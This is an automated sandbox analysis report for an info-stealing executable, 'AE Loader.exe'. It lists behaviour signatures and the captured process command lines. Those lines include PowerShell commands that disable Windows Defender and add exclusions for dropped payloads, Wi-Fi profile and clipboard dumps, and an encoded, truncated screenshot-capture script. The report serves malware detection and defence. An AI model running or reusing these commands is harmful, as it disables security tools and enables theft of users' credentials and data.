Analysis Overview
SHA256
922eedd1532bbc6b06b9c3d93b0c6207b0da565bb7fb511740010304fda56a6e
Threat Level: Known bad
The file AE Loader.exe was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Command and Scripting Interpreter: PowerShell
Stops running service(s)
Contacts a large (947) amount of remote hosts
Loads dropped DLL
Checks computer location settings
Unsecured Credentials: Credentials In Files
Clipboard Data
Executes dropped EXE
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Obfuscated Files or Information: Command Obfuscation
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates processes with tasklist
UPX packed file
Launches sc.exe
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Unsigned PE
Detects Pyinstaller
Enumerates physical storage devices
System Network Configuration Discovery: Wi-Fi Discovery
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Modifies registry key
Runs ping.exe
Scheduled Task/Job: Scheduled Task
Gathers system information
Detects videocard installed
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-05 02:06
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-05 02:06
Reported
2024-11-05 02:08
Platform
win10v2004-20241007-en
Max time kernel
35s
Max time network
131s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Contacts a large (947) amount of remote hosts
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\AE Loader.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Microsoft\hacn.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\hacn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\hacn.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\hacn.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\based.exe | N/A |
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\AE Loader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\AE Loader.exe
"C:\Users\Admin\AppData\Local\Temp\AE Loader.exe"
C:\ProgramData\Microsoft\hacn.exe
"C:\ProgramData\Microsoft\hacn.exe"
C:\ProgramData\Microsoft\based.exe
"C:\ProgramData\Microsoft\based.exe"
C:\ProgramData\Microsoft\based.exe
"C:\ProgramData\Microsoft\based.exe"
C:\ProgramData\Microsoft\hacn.exe
"C:\ProgramData\Microsoft\hacn.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe -pbeznogym
C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe
C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe -pbeznogym
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\ProgramData\main.exe
"C:\ProgramData\main.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\ProgramData\crss.exe
"C:\ProgramData\crss.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\ProgramData\svchost.exe
"C:\ProgramData\svchost.exe"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\ProgramData\setup.exe
"C:\ProgramData\setup.exe"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\ProgramData\crss.exe
"C:\ProgramData\crss.exe"
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQA